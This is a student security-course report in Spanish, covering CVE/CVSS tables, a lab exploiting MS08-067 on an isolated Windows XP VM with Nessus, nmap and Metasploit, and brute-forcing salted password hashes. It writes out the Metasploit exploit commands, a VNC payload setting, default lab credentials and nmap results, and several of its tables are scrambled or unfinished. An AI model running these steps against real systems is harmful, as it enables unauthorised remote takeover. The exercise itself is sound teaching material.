Вы находитесь на странице: 1из 29

TECNOLOGÍAS Y HERRAMIENTAS EN SEGURIDAD DE LA INFORMACIÓN Y LAS

REDES

TALLER: 1, 2 Y 3

ESTUDIANTES

Bryan Forero Orjuela

Johan Manuel Coy Franco

Erica Milena Montoya Gallego

BOGOTÁ

UNIVERSIDAD CATÓLICA DE COLOMBIA

ESPECIALIZACIÓN EN SEGURIDAD DE LA INFORMACIÓN

TECNOLOGÍAS Y HERRAMIENTAS EN SEGURIDAD DE LA INFORMACIÓN Y LAS

REDES

AGOSTO 2019
TALLER 1
IDENTIFICACIÓN DE VULNERABILIDADES DE ACUERDO A CVE Y CVSS

TALLER 1
ACTIVIDAD 1
CLASIFIC
ACIÓN
AFECTA
IDENTIFICA A QUIÉN DE DESCRIPCIÓN DE
DESCRIPCIÓN VULNERABILIDAD CIÓN
CIÓN AFECTA VULNER LA CLASIFICACIÓN
CIA
ABILIDA
D
Corresponde a una
ip_input.c en implementaciones de vulnerabilidad que
TCP / IP derivadas de BSD permite a ingresa al sistema
Sistema
CVE-1999- los atacantes remotos causar una operativo Disponib
operativ Red
0001 denegación de servicio (bloqueo o atacando ilidad
o Unix
bloqueo) a través de paquetes directamente la
diseñados. funcionalidad de la
Red del mismo.
La condición de carrera en el
manejador de fallas de página
Mediante la
(fault.c) para el kernel de Linux 2.2.x
ejecución del
a 2.2.7, 2.4 a 2.4.29 y 2.6 a 2.6.10,
código, la
cuando se ejecuta en máquinas Sistema Bajo -
vulnerabilidad
CVE-2005- multiprocesador, permite a los operativ sistema Total -
afecta el kernel del
0001 usuarios locales ejecutar código o Linux operativ CIA
sistema operativo
arbitrario a través de subprocesos (kernel) o
mediante la
simultáneos que comparten el
utilización del
mismo espacio de memoria virtual y
espacio del mismo
solicitan simultáneamente la
expansión de la pila.
El subdesbordamiento integral en la la vulnerabilidad
función unlzw en unlzw.c en gzip está identificada
antes de 1.4 en plataformas de 64 en la red ya que la
bits, tal como se usa en ncompress y intrusión -acceso Parcial
probablemente en otros, permite a se facilita todos
CVE-2010- los atacantes remotos causar una Unix de mediante la red, los
Red
0001 denegación de servicio (bloqueo de 64 bits brindando la compon
la aplicación) o posiblemente posibilidad de entes
ejecutar código arbitrario a través denegar servicios del CIA
de un archivo creado a mano que y en ese espacio y
utiliza la compresión LZW, lo que puede acceder a la
lleva a un error de índice de matriz. información
Doble vulnerabilidad gratuita en la
función iscsi_rx_handler (usr / iscsi /
iscsid.c) en el demonio tgt (tgtd) en
el marco de destino de Linux SCSI
(tgt) antes de 1.0.14, también
conocido como scsi-target-utils, Permite una
permite que atacantes remotos denegación de Afecta
provoquen un denial de servicio Sistema servicios y posible principal
CVE-2011-
(memoria dañada y falla) y Operativ Red ejecución de mente la
0001
posiblemente ejecute código o Linux código. Errores de disponib
arbitrario a través de vectores gestión de ilidad.
desconocidos relacionados con un recursos.
desbordamiento de búfer durante el
inicio de sesión de iscsi. NOTA:
algunos de estos detalles se
obtienen a partir de información de
terceros.
Afecta
Permite una todos
El desbordamiento del búfer en denegación de los
client / mysql.cc en Oracle MySQL y servicios y posible compon
MariaDB antes de 5.5.35 permite a ejecución de entes
los servidores de bases de datos Sistema código. No se CIA pero
CVE-2014-
remotas causar una denegación de Operativ Red necesita tener principal
0001
servicio (bloqueo) y posiblemente o Linux conocimiento mente la
ejecutar código arbitrario a través avanzado para la confiden
de una cadena de versión de explotación de cialidad
servidor larga. esta y
vulnerabilidad. disponib
ilidad.
El componente Informe de errores Bajo -
de Windows (WER) en Microsoft Sistema
Windows 8, Windows 8.1, Windows Operativ
Afecta la
Server 2012 Gold y R2, y Windows o
confiden
RT Gold y 8.1 permite a los usuarios Microsof
cialidad.
locales evitar el mecanismo de Sistema t Permisos,
Permite
CVE-2015- protección Protected Process Light y Operativ Windows privilegios y
la
0001 leer el contenido de ubicaciones o 8, controles de
divulgaci
arbitrarias de memoria de proceso Windows Windows acceso
ón de la
aprovechando los privilegios 8.1,
informac
administrativos, también conocido Windows
ión.
como "Vulnerabilidad de omisión de Server
la característica de seguridad de 2012
informes de errores de Windows" Gold y
R2, y
Windows
RT Gold y
8.1

ACTIVIDAD 2
Visibilidad completa de la fórmula sin
Descripción de la Vulnerabilidad
permiso para acceder a ella

MÉTRICAS DE BASE PUNTUACIÓN 5.3


Respuest Argumentación de Respues
Criterio Argumentación de la respuesta Criterio
a la respuesta ta
Para acceder al aplicativo es
necesario ingresar desde la estación
de trabajo; lo cual implica un acceso Se evidencia que
local (autenticación local) y luego en el momento de
directamente en el sistema; por la irrupción se
ello, no se puede acceder reflejo
directamente por la red si no hay información con
Vector de acceso a la estación de trabajo en Alcance caracteres sin
ataque (AV) modo local Local (s) sentido Cambio
La información a la
cual se tuvo
acceso es
completamente
confidencial,
Complejida El atacante debe tener acceso a la Confiden sensible y
d de ataque estación de trabajo propia y luego cialidad susceptible para la
(AC) autenticarse también en el sistema Alto (c) empresa Alto
El cambio de datos
Para acceder a la vulnerabilidad el se realizó sobre el
atacante solo requirió la nombre de usuario
autenticación de un usuario sin que utilizado mas no
Privilegios este tuviera permisos de en la información
requeridos administración para acceder a Integrida sensible
(PR) información sensible Bajo d (I) propiamente Ninguno
La disponibilidad
del servicio no se
Interacción Es necesario que el usuario se vió afectada en las
con el autentique dos veces para poder Requerid Disponibi irrupciones
usuario (UI) acceder a la vulnerabilidad o lidad (A) identificadas Ninguno
MÉTRICAS TEMPORALES PUNTUACIÓN 5.3
No Los eventos identificados son recientes
Código de Explotación de Madurez (E) definido por lo que aún está en identificación
No Los eventos identificados son recientes
Nivel de Remediación (RL) definido por lo que aún está en identificación
Informe de confianza (RC)
METRICAS AMBIENTALES PUNTUACIÓN Commented [1]: Falta terminar numeral
Requisito
de
confidencia
lidad (CR)
Requisito
de
integridad
(IR)
Requisito
de
disponibilid
ad (AR)
Vector de
ataque
modificado
(MAV)
Complejida
d de ataque
modificada
(MAC)
Privilegios
modificado
s
requeridos
(MPR)
Interacción
con el
usuario
modificado
(MUI)
Alcance
modificado
(MS)
Confidencia
lidad
Modificada
(MC)

Integridad
Modificada
(MI)
Disponibilid
ad
modificada
(MA)
TALLER 2
USO DE LAS HERRAMIENTAS: ESCANER DE VULNERABILIDADES, ESCANER DE RED
Y FRAMEWORK DE EXPLOTACIÓN

EVIDENCIAS
1. Instalar la herramienta de virtualización Oracle Virtual Box última versión.

2. Importar el archivo WinXp.ova (proporcionado por el profesor) (no tiene contraseña)


en una máquina virtual de Virtual Box

3. Importar la última versión del sistema operativo Kali Linux en una máquina virtual de
Virtual Box (proporcionado por el profesor) (el usuario y contraseña de Kali Linux son
los valores por defecto, usuario=root, contraseña=toor).
4. Para su conocimiento la versión entregada de Kali Linux ya tiene preinstalado el
escáner de vulnerabilidades Nessus. (http://localhost:8834, usuario: ucatolica,
contraseña: ucatolica) y el framework de ataque Metasploit Framework.
5. Con los dos pasos anteriores el entorno tendrá dos sistemas operativos en ejecución,
Windows XP y Kali Linux.

6. Configurar y validar la conectividad de red entre las dos maquinas virtuales, la


maquina Windows XP fue creada con la configuración de red de Virtual Box “Internal
Network”, esta es una configuración que despliega una red privada para las maquinas
virtuales anexas a ella, sin contacto de red con el computador anfitrión ni la red
externa. La IP configurada en el SO Windows XP es 10.0.1.200.
La maquina virtual Kali Linux debe ser reconfigurada para que interactúe con la
maquina Windows y tome la dirección IP 10.0.1.100.

Visualización de IP´s configuradas


Validación de Conectividad Kali-WindowsXP

7. Lanzar el escáner de vulnerabilidades Nessus desde Kali linux, teniendo como


objetivo el SO Windows XP.

Inicialización de Nessus

Acceso a Nessus

Creación de un nuevo SCAN


Ejecución del SCAN de vulnerabilidades

Resultados obtenidos mediante el Scan


8. Lanzar el escáner de red nmap desde Kali Linux, teniendo como objetivo el SO
Windows XP, la intención es confirmar la vulnerabilidad crítica ms08-067 identificada
en OpenVAS. Para esto se debe abrir una terminal y teclear el siguiente comando:
#nmap --script smb-vuln-ms08-067.nse –p445<target>
*<target> se debe cambiar por la ip de la máquina objetivo.
9. Explotar la vulnerabilidad MS08-067 en el SO Windows XP, si esta fue encontrada.
Para esto se utiliza el framework de ataque Metasploit picando en el grupo de
aplicaciones “Exploitation Tools” luego en el enlace “metasploit framework” y se digitan
las siguientes instrucciones:

Se Inicia la consola para uso de la herramienta Metasploit Framework


a. msf>search ms08_067
Se da busqueda a la vulnerabilidad identificada en el Scan

b. msf>use windows/smb/ms08_067_netapi

Se identifica la ubicación de la vulnerabilidad

c. msf>show payloads

Se visualizan los Payloads que serán utilizados por el exploit


d. msf>set PAYLOAD windows/vncinject/bind_tcp

Se define el payload a utilizar

e. msf>show options
f. msf>set RHOST 10.0.1.200

Definimos la dirección IP del objetivo, Sistema Operativo XP.


g. msf>exploit

Se explota la vulnerabilidad, tras la ejecución de esta vulnerabilidad podemos


tener acceso y control sobre la máquina Windows XP.

10. Una vez finalizada la parte práctica responda las siguientes preguntas:

a. Como se evidenció la existencia de la vulnerabilidad MS08-067 en el sistema


operativo Windows XP?
Tras la ejecución de un Scan mediante la herramienta Nessus se identifica la
existencia de la vulnerabilidad en el sistema operativo XP. Para confirmar la existencia
de esta vulnerabilidad se hace ejecución de la herramienta de exploración map para
identificar los puertos abiertos y hacer uso de ellos para ejecución de código mediante
acceso remoto.

Evidencia Nmap

nmap --script smb-vuln-ms08-067.nse –p445 10.0.1.200

Starting Nmap 7.60 ( https://nmap.org ) at 2019-08-13 20:17 EDT


Failed to resolve "–p445".
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify
valid servers with --dns-servers
Nmap scan report for 10.0.1.200
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:E0:60:2A (Oracle VirtualBox virtual NIC)

Host script results:


| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

b. Porque razón el sistema operativo Windows XP es vulnerable a MS08-067? Que


versiones de Windows XP son vulnerables?

La causa de esta vulnerabilidad es el servicio del servidor, que no controla


correctamente las solicitudes de RPC (RPC, Remote Procedure Calls), el
sistema local invoca, a través de la red, a una función alojada en otro sistema.

Sistema Operativo Impacto Gravedad

Windows XP Service Pack Ejecución remota de Crítico


2
código

Windows XP Service Pack Ejecución remota de Crítico


3 código

Windows XP Professional Ejecución remota de Crítico


x64 Edition código

Windows XP Professional Ejecución remota de Crítico


x64 Edition Service Pack 2 código

c. Como se corrige la vulnerabilidad MS08-067?

Debe ejecutarse una actualización de seguridad que permita mitigar la vulnerabilidad


al corregir la forma en que el servicio del servidor maneja las solicitudes RPC , este
parche se puede ubicar en Windows Update.

Las actualizaciones definidas por el fabricante se relacionan a continuación:

Despliegue

Instalación sin Windows XP Service Pack 2 y Windows XP Service


intervención del Pack 3:
usuario
● Windowsxp-kb958644-x86-enu / quiet

Windows XP Professional x64 Edition y Windows XP


Professional x64 Edition Service Pack 2:

● WindowsServer2003.WindowsXP-kb958644-
x64-enu / quiet

Instalar sin Windows XP Service Pack 2 y Windows XP Service


reiniciar Pack 3:

● Windowsxp-kb958644-x86-enu / norestart

Windows XP Professional x64 Edition y Windows XP


Professional x64 Edition Service Pack 2:
● WindowsServer2003.WindowsXP-kb958644-
x64-enu / norestart

Actualizar archivo KB958644.log


de registro

Requisito de reinicio

¿Reinicio Sí, debe reiniciar su sistema después de aplicar esta


requerido? actualización de seguridad.

HotPatching No aplica

Información de Use la herramienta Agregar o quitar programas en el


eliminación Panel de control o la utilidad Spuninst.exe ubicada en
la carpeta% Windir% \ $ NTUninstallKB958644 $ \
Spuninst

Verificación de Windows XP Service Pack 2 y Windows XP Service


clave de registro Pack 3:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \


Updates \ Windows XP \ SP4 \ KB958644 \ Filelist

Windows XP Professional x64 Edition y Windows XP


Professional x64 Edition Service Pack 2:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \


Updates \ Windows XP Version 2003 \ SP3 \ KB958644
\ Filelist

d. Cuál código CVE (Common Vulerabilties and Exposure) esta asociado a la


vulnerabilidad MS08-067

CVE-2008-4250
El servicio del servidor en Microsoft Windows 2000 SP4, XP SP2 y SP3, Server 2003
SP1 y SP2, Vista Gold y SP1, Server 2008 y 7 Pre-Beta permite a los atacantes
remotos ejecutar código arbitrario a través de una solicitud RPC diseñada que
desencadena el desbordamiento durante canonicalización de ruta, como la explotó en
la naturaleza Gimmiv.A en octubre de 2008, también conocida como "Vulnerabilidad
del servicio del servidor".

e. Construya una tabla y relacione que otras vulnerabilidades críticas se encontraron


en el sistema operativo Windows XP?

f. Que es Nessus?
Es un programa de escaneo de vulnerabilidades desde una interfaz gráfica, es una
potente aplicación de detección de vulnerabilidades muy usada tanto por los
hackers, como por los expertos en seguridad informática cuando tienen que
realizar auditorías.

g. Qué es nmap?
Es un programa que permite realizar escaneo de vulnerabilidades de red a partir de
la consola de código.
Nmap, abreviatura de Network Mapper es una aplicación multiplataforma usada para
explorar redes y obtener información acerca de los servicios, sistemas operativos y
vulnerabilidades.

h. Que es “metasploit framework”?

Es uno de los marcos de pruebas de penetración más utilizados por las


corporaciones a las agencias de aplicación de la ley. Metasploit se compone de más
de 1500 módulos que ofrecen funcionalidades que cubren cada fase de una prueba
de penetración, lo que hace que la vida de un penetest sea comparativamente más
sencilla.
Esto es un marco de código abierto. También ofrece un enfoque extenso en el
desarrollo de nuevos exploits y en la automatización.

TALLER 3

Los sistemas informáticos actuales soportan su operación en los mecanismos de control de


acceso y estos a su vez se apoyan representativamente en el uso de contraseñas. El presente
ejercicio estudiara las debilidades y fortalezas existentes en el uso de contraseñas.

El ejercicio parte de la disposición de los siguientes alfabetos:

● Alfabeto 1: a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
JKLMNOPQRSTUVWXYZ
● Alfabeto 2: a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
JKLMNOPQRSTUVWXYZ:.;,_+<>?=()/%#
● Alfabeto 3: a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
JKLMNOPQRSTUVWXYZ:.;,_+<>?=()/%#0123456
● 789
Complementariamente el ejercicio utiliza el script adjunto que ejecuta un ataque de fuerza
bruta para revelar contraseñas de tres caracteres utilizando el alfabeto 1, el script tiene como
parámetro de entrada la variable “sal” o “salt” y el hash de la contraseña, de la siguiente forma:

Ejemplo: $script ok okZdSfLRp/FqA

La sintaxis anterior dara como resultado, la revelación de la contraseña: abc


NOTA:

Este script debe ejecutarse con permisos de ejecución en una consola Linux, se
recomienda utilizar la consola de Kali Linux.
Ubicación del Script

Código del Script


Permisos de ejecución

Ejecución del Ejemplo


A partir de la tabla a continuación que muestra el hash de tres contraseñas con sus
respectivos alfabetos y sal, se deben completar las celdas vacías atendiendo los interrogantes
relacionados debajo de la tabla.

Alfabeto Número de Salt Hash Contraseña Contraseña Tiempo


Caracteres

Alfabeto 2 3 7. 7.uyKOqNXxU26 _A_ 00:40:15


hh:mm:ss

Alfabeto 3 3 h0 h0OeRKTqY6xcM 4_T 01:04:16


hh:mm:ss

Alfabeto 1 8 aa aajfMKNH1hTm2
Modifique el script para encontrar la contraseña del alfabeto 2 de tres caracteres,
muestre el script, la contraseña revelada y el tiempo utilizado.

Alfabeto 2

Modificación de Script - Adición de caracteres especiales al alfabeto

Se descifra la contraseña para el Alfabeto 2


Alfabeto Número de Salt Hash Contraseña Contraseña Tiempo
Caracteres

Alfabeto 2 3 7. 7.uyKOqNXxU26 _A_ 00:40:15


hh:mm:ss

Alfabeto 3 3 h0 h0OeRKTqY6xcM

Alfabeto 1 8 aa aajfMKNH1hTm2

Modifique el script para encontrar la contraseña del alfabeto 3 de tres caracteres,


muestre el script, la contraseña revelada y el tiempo utilizado.

Alfabeto 3

Modificación del Script - Adición de caracteres numéricos al alfabeto


Se descifra la contraseña para el Alfabeto 3
Alfabeto Número de Salt Hash Contraseña Contraseña Tiempo
Caracteres

Alfabeto 2 3 7. 7.uyKOqNXxU26 _A_ 00:40:15


hh:mm:ss

Alfabeto 3 3 h0 h0OeRKTqY6xcM 4_T 01:04:16


hh:mm:ss

Alfabeto 1 8 aa aajfMKNH1hTm2

Modifique el script para encontrar la contraseña del alfabeto 1 de ocho caracteres,


muestre el script, la contraseña revelada y el tiempo utilizado. Se recomienda modificar
el script con un mecanismo diferente al ataque de fuerza bruta, en contexto explique
que otro mecanismo más inteligente utilizaría.

Alfabeto 1

Modificación del Script - Se adicionan únicamente caracteres alfabéticos en minúscula y


mayúscula

Alfabeto Número de Salt Hash Contraseña Contraseña Tiempo


Caracteres

Alfabeto 2 3 7. 7.uyKOqNXxU26 _A_ 00:40:15


hh:mm:ss

Alfabeto 3 3 h0 h0OeRKTqY6xcM 4_T 01:04:16


hh:mm:ss

Alfabeto 1 8 aa aajfMKNH1hTm2

Вам также может понравиться